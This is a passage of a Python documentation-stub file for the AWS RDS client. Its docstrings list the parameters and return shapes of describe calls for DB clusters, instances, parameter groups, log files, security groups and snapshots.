    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example lists settings for the specified DB cluster parameter group.
    Expected Output:
    :example: response = client.describe_db_cluster_parameter_groups(
    DBClusterParameterGroupName='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type DBClusterParameterGroupName: string
    :param DBClusterParameterGroupName: The name of a specific DB cluster parameter group to return details for.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Filters: list
    :param Filters: This parameter is not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeDBClusterParameterGroups request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :rtype: dict
    :return: {
    'Marker': 'string',
    'DBClusterParameterGroups': [
    {
    'DBClusterParameterGroupName': 'string',
    'DBParameterGroupFamily': 'string',
    'Description': 'string',
    'DBClusterParameterGroupArn': 'string'
    },
    ]
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_cluster_parameters(DBClusterParameterGroupName=None, Source=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Returns the detailed parameter list for a particular DB cluster parameter group.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example lists system parameters for the specified DB cluster parameter group.
    Expected Output:
    :example: response = client.describe_db_cluster_parameters(
    DBClusterParameterGroupName='string',
    Source='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type DBClusterParameterGroupName: string
    :param DBClusterParameterGroupName: [REQUIRED]
    The name of a specific DB cluster parameter group to return parameter details for.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Source: string
    :param Source: A value that indicates to return only parameters for a specific source. Parameter sources can be engine , service , or customer .
    :type Filters: list
    :param Filters: This parameter is not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeDBClusterParameters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :rtype: dict
    :return: {
    'Parameters': [
    {
    'ParameterName': 'string',
    'ParameterValue': 'string',
    'Description': 'string',
    'Source': 'string',
    'ApplyType': 'string',
    'DataType': 'string',
    'AllowedValues': 'string',
    'IsModifiable': True|False,
    'MinimumEngineVersion': 'string',
    'ApplyMethod': 'immediate'|'pending-reboot'
    },
    ],
    'Marker': 'string'
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_cluster_snapshot_attributes(DBClusterSnapshotIdentifier=None):
    """
    Returns a list of DB cluster snapshot attribute names and values for a manual DB cluster snapshot.
    When sharing snapshots with other AWS accounts, DescribeDBClusterSnapshotAttributes returns the restore attribute and a list of IDs for the AWS accounts that are authorized to copy or restore the manual DB cluster snapshot. If all is included in the list of values for the restore attribute, then the manual DB cluster snapshot is public and can be copied or restored by all AWS accounts.
    To add or remove access for an AWS account to copy or restore a manual DB cluster snapshot, or to make the manual DB cluster snapshot public or private, use the ModifyDBClusterSnapshotAttribute API action.
    See also: AWS API Documentation
    Examples
    This example lists attributes for the specified DB cluster snapshot.
    Expected Output:
    :example: response = client.describe_db_cluster_snapshot_attributes(
    DBClusterSnapshotIdentifier='string'
    )
    :type DBClusterSnapshotIdentifier: string
    :param DBClusterSnapshotIdentifier: [REQUIRED]
    The identifier for the DB cluster snapshot to describe the attributes for.
    :rtype: dict
    :return: {
    'DBClusterSnapshotAttributesResult': {
    'DBClusterSnapshotIdentifier': 'string',
    'DBClusterSnapshotAttributes': [
    {
    'AttributeName': 'string',
    'AttributeValues': [
    'string',
    ]
    },
    ]
    }
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_cluster_snapshots(DBClusterIdentifier=None, DBClusterSnapshotIdentifier=None, SnapshotType=None, Filters=None, MaxRecords=None, Marker=None, IncludeShared=None, IncludePublic=None):
    """
    Returns information about DB cluster snapshots. This API action supports pagination.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example lists settings for the specified, manually-created cluster snapshot.
    Expected Output:
    :example: response = client.describe_db_cluster_snapshots(
    DBClusterIdentifier='string',
    DBClusterSnapshotIdentifier='string',
    SnapshotType='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string',
    IncludeShared=True|False,
    IncludePublic=True|False
    )
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: The ID of the DB cluster to retrieve the list of DB cluster snapshots for. This parameter cannot be used in conjunction with the DBClusterSnapshotIdentifier parameter. This parameter is not case-sensitive.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type DBClusterSnapshotIdentifier: string
    :param DBClusterSnapshotIdentifier: A specific DB cluster snapshot identifier to describe. This parameter cannot be used in conjunction with the DBClusterIdentifier parameter. This value is stored as a lowercase string.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    If this identifier is for an automated snapshot, the SnapshotType parameter must also be specified.
    :type SnapshotType: string
    :param SnapshotType: The type of DB cluster snapshots to be returned. You can specify one of the following values:
    automated - Return all DB cluster snapshots that have been automatically taken by Amazon RDS for my AWS account.
    manual - Return all DB cluster snapshots that have been taken by my AWS account.
    shared - Return all manual DB cluster snapshots that have been shared to my AWS account.
    public - Return all DB cluster snapshots that have been marked as public.
    If you don't specify a SnapshotType value, then both automated and manual DB cluster snapshots are returned. You can include shared DB cluster snapshots with these results by setting the IncludeShared parameter to true . You can include public DB cluster snapshots with these results by setting the IncludePublic parameter to true .
    The IncludeShared and IncludePublic parameters don't apply for SnapshotType values of manual or automated . The IncludePublic parameter doesn't apply when SnapshotType is set to shared . The IncludeShared parameter doesn't apply when SnapshotType is set to public .
    :type Filters: list
    :param Filters: This parameter is not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeDBClusterSnapshots request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :type IncludeShared: boolean
    :param IncludeShared: Set this value to true to include shared manual DB cluster snapshots from other AWS accounts that this AWS account has been given permission to copy or restore, otherwise set this value to false . The default is false .
    You can give an AWS account permission to restore a manual DB cluster snapshot from another AWS account by the ModifyDBClusterSnapshotAttribute API action.
    :type IncludePublic: boolean
    :param IncludePublic: Set this value to true to include manual DB cluster snapshots that are public and can be copied or restored by any AWS account, otherwise set this value to false . The default is false .
    You can share a manual DB cluster snapshot as public by using the ModifyDBClusterSnapshotAttribute API action.
    :rtype: dict
    :return: {
    'Marker': 'string',
    'DBClusterSnapshots': [
    {
    'AvailabilityZones': [
    'string',
    ],
    'DBClusterSnapshotIdentifier': 'string',
    'DBClusterIdentifier': 'string',
    'SnapshotCreateTime': datetime(2015, 1, 1),
    'Engine': 'string',
    'AllocatedStorage': 123,
    'Status': 'string',
    'Port': 123,
    'VpcId': 'string',
    'ClusterCreateTime': datetime(2015, 1, 1),
    'MasterUsername': 'string',
    'EngineVersion': 'string',
    'LicenseModel': 'string',
    'SnapshotType': 'string',
    'PercentProgress': 123,
    'StorageEncrypted': True|False,
    'KmsKeyId': 'string',
    'DBClusterSnapshotArn': 'string',
    'SourceDBClusterSnapshotArn': 'string',
    'IAMDatabaseAuthenticationEnabled': True|False
    },
    ]
    }
    :returns:
    CreateDBClusterSnapshot
    DeleteDBClusterSnapshot
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_clusters(DBClusterIdentifier=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Returns information about provisioned Aurora DB clusters. This API supports pagination.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example lists settings for the specified DB cluster.
    Expected Output:
    :example: response = client.describe_db_clusters(
    DBClusterIdentifier='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: The user-supplied DB cluster identifier. If this parameter is specified, information from only the specific DB cluster is returned. This parameter isn't case-sensitive.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Filters: list
    :param Filters: A filter that specifies one or more DB clusters to describe.
    Supported filters:
    db-cluster-id - Accepts DB cluster identifiers and DB cluster Amazon Resource Names (ARNs). The results list will only include information about the DB clusters identified by these ARNs.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeDBClusters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :rtype: dict
    :return: {
    'Marker': 'string',
    'DBClusters': [
    {
    'AllocatedStorage': 123,
    'AvailabilityZones': [
    'string',
    ],
    'BackupRetentionPeriod': 123,
    'CharacterSetName': 'string',
    'DatabaseName': 'string',
    'DBClusterIdentifier': 'string',
    'DBClusterParameterGroup': 'string',
    'DBSubnetGroup': 'string',
    'Status': 'string',
    'PercentProgress': 'string',
    'EarliestRestorableTime': datetime(2015, 1, 1),
    'Endpoint': 'string',
    'ReaderEndpoint': 'string',
    'MultiAZ': True|False,
    'Engine': 'string',
    'EngineVersion': 'string',
    'LatestRestorableTime': datetime(2015, 1, 1),
    'Port': 123,
    'MasterUsername': 'string',
    'DBClusterOptionGroupMemberships': [
    {
    'DBClusterOptionGroupName': 'string',
    'Status': 'string'
    },
    ],
    'PreferredBackupWindow': 'string',
    'PreferredMaintenanceWindow': 'string',
    'ReplicationSourceIdentifier': 'string',
    'ReadReplicaIdentifiers': [
    'string',
    ],
    'DBClusterMembers': [
    {
    'DBInstanceIdentifier': 'string',
    'IsClusterWriter': True|False,
    'DBClusterParameterGroupStatus': 'string',
    'PromotionTier': 123
    },
    ],
    'VpcSecurityGroups': [
    {
    'VpcSecurityGroupId': 'string',
    'Status': 'string'
    },
    ],
    'HostedZoneId': 'string',
    'StorageEncrypted': True|False,
    'KmsKeyId': 'string',
    'DbClusterResourceId': 'string',
    'DBClusterArn': 'string',
    'AssociatedRoles': [
    {
    'RoleArn': 'string',
    'Status': 'string'
    },
    ],
    'IAMDatabaseAuthenticationEnabled': True|False,
    'ClusterCreateTime': datetime(2015, 1, 1)
    },
    ]
    }
    :returns:
    CreateDBCluster
    DeleteDBCluster
    FailoverDBCluster
    ModifyDBCluster
    RestoreDBClusterFromSnapshot
    RestoreDBClusterToPointInTime
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_engine_versions(Engine=None, EngineVersion=None, DBParameterGroupFamily=None, Filters=None, MaxRecords=None, Marker=None, DefaultOnly=None, ListSupportedCharacterSets=None, ListSupportedTimezones=None):
    """
    Returns a list of the available DB engines.
    See also: AWS API Documentation
    Examples
    This example lists settings for the specified DB engine version.
    Expected Output:
    :example: response = client.describe_db_engine_versions(
    Engine='string',
    EngineVersion='string',
    DBParameterGroupFamily='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string',
    DefaultOnly=True|False,
    ListSupportedCharacterSets=True|False,
    ListSupportedTimezones=True|False
    )
    :type Engine: string
    :param Engine: The database engine to return.
    :type EngineVersion: string
    :param EngineVersion: The database engine version to return.
    Example: 5.1.49
    :type DBParameterGroupFamily: string
    :param DBParameterGroupFamily: The name of a specific DB parameter group family to return details for.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Filters: list
    :param Filters: Not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more than the MaxRecords value is available, a pagination token called a marker is included in the response so that the following results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :type DefaultOnly: boolean
    :param DefaultOnly: Indicates that only the default version of the specified engine or engine and major version combination is returned.
    :type ListSupportedCharacterSets: boolean
    :param ListSupportedCharacterSets: If this parameter is specified and the requested engine supports the CharacterSetName parameter for CreateDBInstance , the response includes a list of supported character sets for each engine version.
    :type ListSupportedTimezones: boolean
    :param ListSupportedTimezones: If this parameter is specified and the requested engine supports the TimeZone parameter for CreateDBInstance , the response includes a list of supported time zones for each engine version.
    :rtype: dict
    :return: {
    'Marker': 'string',
    'DBEngineVersions': [
    {
    'Engine': 'string',
    'EngineVersion': 'string',
    'DBParameterGroupFamily': 'string',
    'DBEngineDescription': 'string',
    'DBEngineVersionDescription': 'string',
    'DefaultCharacterSet': {
    'CharacterSetName': 'string',
    'CharacterSetDescription': 'string'
    },
    'SupportedCharacterSets': [
    {
    'CharacterSetName': 'string',
    'CharacterSetDescription': 'string'
    },
    ],
    'ValidUpgradeTarget': [
    {
    'Engine': 'string',
    'EngineVersion': 'string',
    'Description': 'string',
    'AutoUpgrade': True|False,
    'IsMajorVersionUpgrade': True|False
    },
    ],
    'SupportedTimezones': [
    {
    'TimezoneName': 'string'
    },
    ]
    },
    ]
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_instances(DBInstanceIdentifier=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Returns information about provisioned RDS instances. This API supports pagination.
    See also: AWS API Documentation
    Examples
    This example lists settings for the specified DB instance.
    Expected Output:
    :example: response = client.describe_db_instances(
    DBInstanceIdentifier='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: The user-supplied instance identifier. If this parameter is specified, information from only the specific DB instance is returned. This parameter isn't case-sensitive.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Filters: list
    :param Filters: A filter that specifies one or more DB instances to describe.
    Supported filters:
    db-cluster-id - Accepts DB cluster identifiers and DB cluster Amazon Resource Names (ARNs). The results list will only include information about the DB instances associated with the DB Clusters identified by these ARNs.
    db-instance-id - Accepts DB instance identifiers and DB instance Amazon Resource Names (ARNs). The results list will only include information about the DB instances identified by these ARNs.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeDBInstances request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :rtype: dict
    :return: {
    'Marker': 'string',
    'DBInstances': [
    {
    'DBInstanceIdentifier': 'string',
    'DBInstanceClass': 'string',
    'Engine': 'string',
    'DBInstanceStatus': 'string',
    'MasterUsername': 'string',
    'DBName': 'string',
    'Endpoint': {
    'Address': 'string',
    'Port': 123,
    'HostedZoneId': 'string'
    },
    'AllocatedStorage': 123,
    'InstanceCreateTime': datetime(2015, 1, 1),
    'PreferredBackupWindow': 'string',
    'BackupRetentionPeriod': 123,
    'DBSecurityGroups': [
    {
    'DBSecurityGroupName': 'string',
    'Status': 'string'
    },
    ],
    'VpcSecurityGroups': [
    {
    'VpcSecurityGroupId': 'string',
    'Status': 'string'
    },
    ],
    'DBParameterGroups': [
    {
    'DBParameterGroupName': 'string',
    'ParameterApplyStatus': 'string'
    },
    ],
    'AvailabilityZone': 'string',
    'DBSubnetGroup': {
    'DBSubnetGroupName': 'string',
    'DBSubnetGroupDescription': 'string',
    'VpcId': 'string',
    'SubnetGroupStatus': 'string',
    'Subnets': [
    {
    'SubnetIdentifier': 'string',
    'SubnetAvailabilityZone': {
    'Name': 'string'
    },
    'SubnetStatus': 'string'
    },
    ],
    'DBSubnetGroupArn': 'string'
    },
    'PreferredMaintenanceWindow': 'string',
    'PendingModifiedValues': {
    'DBInstanceClass': 'string',
    'AllocatedStorage': 123,
    'MasterUserPassword': 'string',
    'Port': 123,
    'BackupRetentionPeriod': 123,
    'MultiAZ': True|False,
    'EngineVersion': 'string',
    'LicenseModel': 'string',
    'Iops': 123,
    'DBInstanceIdentifier': 'string',
    'StorageType': 'string',
    'CACertificateIdentifier': 'string',
    'DBSubnetGroupName': 'string'
    },
    'LatestRestorableTime': datetime(2015, 1, 1),
    'MultiAZ': True|False,
    'EngineVersion': 'string',
    'AutoMinorVersionUpgrade': True|False,
    'ReadReplicaSourceDBInstanceIdentifier': 'string',
    'ReadReplicaDBInstanceIdentifiers': [
    'string',
    ],
    'ReadReplicaDBClusterIdentifiers': [
    'string',
    ],
    'LicenseModel': 'string',
    'Iops': 123,
    'OptionGroupMemberships': [
    {
    'OptionGroupName': 'string',
    'Status': 'string'
    },
    ],
    'CharacterSetName': 'string',
    'SecondaryAvailabilityZone': 'string',
    'PubliclyAccessible': True|False,
    'StatusInfos': [
    {
    'StatusType': 'string',
    'Normal': True|False,
    'Status': 'string',
    'Message': 'string'
    },
    ],
    'StorageType': 'string',
    'TdeCredentialArn': 'string',
    'DbInstancePort': 123,
    'DBClusterIdentifier': 'string',
    'StorageEncrypted': True|False,
    'KmsKeyId': 'string',
    'DbiResourceId': 'string',
    'CACertificateIdentifier': 'string',
    'DomainMemberships': [
    {
    'Domain': 'string',
    'Status': 'string',
    'FQDN': 'string',
    'IAMRoleName': 'string'
    },
    ],
    'CopyTagsToSnapshot': True|False,
    'MonitoringInterval': 123,
    'EnhancedMonitoringResourceArn': 'string',
    'MonitoringRoleArn': 'string',
    'PromotionTier': 123,
    'DBInstanceArn': 'string',
    'Timezone': 'string',
    'IAMDatabaseAuthenticationEnabled': True|False
    },
    ]
    }
    :returns:
    CreateDBInstance
    DeleteDBInstance
    ModifyDBInstance
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_log_files(DBInstanceIdentifier=None, FilenameContains=None, FileLastWritten=None, FileSize=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Returns a list of DB log files for the DB instance.
    See also: AWS API Documentation
    Examples
    This example lists matching log file names for the specified DB instance, file name pattern, last write date in POSIX time with milliseconds, and minimum file size.
    Expected Output:
    :example: response = client.describe_db_log_files(
    DBInstanceIdentifier='string',
    FilenameContains='string',
    FileLastWritten=123,
    FileSize=123,
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED]
    The customer-assigned name of the DB instance that contains the log files you want to list.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type FilenameContains: string
    :param FilenameContains: Filters the available log files for log file names that contain the specified string.
    :type FileLastWritten: integer
    :param FileLastWritten: Filters the available log files for files written since the specified date, in POSIX timestamp format with milliseconds.
    :type FileSize: integer
    :param FileSize: Filters the available log files for files larger than the specified size.
    :type Filters: list
    :param Filters: This parameter is not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    :type Marker: string
    :param Marker: The pagination token provided in the previous request. If this parameter is specified the response includes only records beyond the marker, up to MaxRecords.
    :rtype: dict
    :return: {
    'DescribeDBLogFiles': [
    {
    'LogFileName': 'string',
    'LastWritten': 123,
    'Size': 123
    },
    ],
    'Marker': 'string'
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_parameter_groups(DBParameterGroupName=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Returns a list of DBParameterGroup descriptions. If a DBParameterGroupName is specified, the list will contain only the description of the specified DB parameter group.
    See also: AWS API Documentation
    Examples
    This example lists information about the specified DB parameter group.
    Expected Output:
    :example: response = client.describe_db_parameter_groups(
    DBParameterGroupName='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type DBParameterGroupName: string
    :param DBParameterGroupName: The name of a specific DB parameter group to return details for.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Filters: list
    :param Filters: This parameter is not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeDBParameterGroups request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :rtype: dict
    :return: {
    'Marker': 'string',
    'DBParameterGroups': [
    {
    'DBParameterGroupName': 'string',
    'DBParameterGroupFamily': 'string',
    'Description': 'string',
    'DBParameterGroupArn': 'string'
    },
    ]
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_parameters(DBParameterGroupName=None, Source=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Returns the detailed parameter list for a particular DB parameter group.
    See also: AWS API Documentation
    Examples
    This example lists information for up to the first 20 system parameters for the specified DB parameter group.
    Expected Output:
    :example: response = client.describe_db_parameters(
    DBParameterGroupName='string',
    Source='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type DBParameterGroupName: string
    :param DBParameterGroupName: [REQUIRED]
    The name of a specific DB parameter group to return details for.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Source: string
    :param Source: The parameter types to return.
    Default: All parameter types returned
    Valid Values: user | system | engine-default
    :type Filters: list
    :param Filters: This parameter is not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeDBParameters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :rtype: dict
    :return: {
    'Parameters': [
    {
    'ParameterName': 'string',
    'ParameterValue': 'string',
    'Description': 'string',
    'Source': 'string',
    'ApplyType': 'string',
    'DataType': 'string',
    'AllowedValues': 'string',
    'IsModifiable': True|False,
    'MinimumEngineVersion': 'string',
    'ApplyMethod': 'immediate'|'pending-reboot'
    },
    ],
    'Marker': 'string'
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_security_groups(DBSecurityGroupName=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Return descriptions of DB security groups.

    If ``DBSecurityGroupName`` is supplied, only that group is described;
    otherwise all DB security groups for the account are listed.
    See also: AWS API Documentation.

    :type DBSecurityGroupName: string
    :param DBSecurityGroupName: Name of the DB security group to describe.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous
        DescribeDBSecurityGroups request; results resume after it.
    :rtype: dict
    :return: Dict with keys ``'Marker'`` and ``'DBSecurityGroups'``. Each
        group dict carries ``OwnerId``, ``DBSecurityGroupName``,
        ``DBSecurityGroupDescription``, ``VpcId``, ``EC2SecurityGroups``
        (Status, EC2SecurityGroupName, EC2SecurityGroupId,
        EC2SecurityGroupOwnerId), ``IPRanges`` (Status, CIDRIP) and
        ``DBSecurityGroupArn``.
    :returns: Related actions: DescribeDBSecurityGroups,
        AuthorizeDBSecurityGroupIngress, CreateDBSecurityGroup,
        RevokeDBSecurityGroupIngress.
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_db_snapshot_attributes(DBSnapshotIdentifier=None):
    """
    Return the attribute names and values of a manual DB snapshot.

    For snapshots shared across AWS accounts, the ``restore`` attribute
    lists the account IDs authorized to copy or restore the snapshot; the
    value ``all`` means the snapshot is public. Use the
    ModifyDBSnapshotAttribute API action to grant or revoke that access.
    See also: AWS API Documentation.

    :type DBSnapshotIdentifier: string
    :param DBSnapshotIdentifier: [REQUIRED] Identifier of the DB snapshot
        whose attributes should be described.
    :rtype: dict
    :return: Dict with key ``'DBSnapshotAttributesResult'`` containing
        ``DBSnapshotIdentifier`` and a ``DBSnapshotAttributes`` list of
        dicts with ``AttributeName`` and ``AttributeValues``.
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_db_snapshots(DBInstanceIdentifier=None, DBSnapshotIdentifier=None, SnapshotType=None, Filters=None, MaxRecords=None, Marker=None, IncludeShared=None, IncludePublic=None):
    """
    Return information about DB snapshots (supports pagination).

    See also: AWS API Documentation.

    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: ID of the DB instance whose snapshots to
        list. Mutually exclusive with ``DBSnapshotIdentifier``; not
        case-sensitive. Constraints: 1-63 alphanumeric characters or
        hyphens, first character a letter, no trailing hyphen or two
        consecutive hyphens.
    :type DBSnapshotIdentifier: string
    :param DBSnapshotIdentifier: A specific snapshot to describe. Mutually
        exclusive with ``DBInstanceIdentifier``; stored lowercase.
        Constraints: 1-255 alphanumeric characters, first character a
        letter, no trailing hyphen or two consecutive hyphens. For an
        automated snapshot, ``SnapshotType`` must also be given.
    :type SnapshotType: string
    :param SnapshotType: Which snapshots to return: ``automated`` (taken
        by Amazon RDS), ``manual`` (taken by my account), ``shared``
        (manual snapshots shared to my account) or ``public`` (marked
        public). When omitted, automated and manual snapshots are
        returned; shared/public ones only when ``IncludeShared`` /
        ``IncludePublic`` are true. ``IncludeShared`` and
        ``IncludePublic`` do not apply to ``manual``/``automated``;
        ``IncludePublic`` does not apply to ``shared``; ``IncludeShared``
        does not apply to ``public``.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous DescribeDBSnapshots
        request; results resume after it.
    :type IncludeShared: boolean
    :param IncludeShared: True to include shared manual snapshots from
        other accounts that this account may copy or restore (granted via
        ModifyDBSnapshotAttribute). Default false.
    :type IncludePublic: boolean
    :param IncludePublic: True to include public manual snapshots that
        any account can copy or restore (shared via
        ModifyDBSnapshotAttribute). Default false.
    :rtype: dict
    :return: Dict with keys ``'Marker'`` and ``'DBSnapshots'``. Each
        snapshot dict carries ``DBSnapshotIdentifier``,
        ``DBInstanceIdentifier``, ``SnapshotCreateTime``, ``Engine``,
        ``AllocatedStorage``, ``Status``, ``Port``, ``AvailabilityZone``,
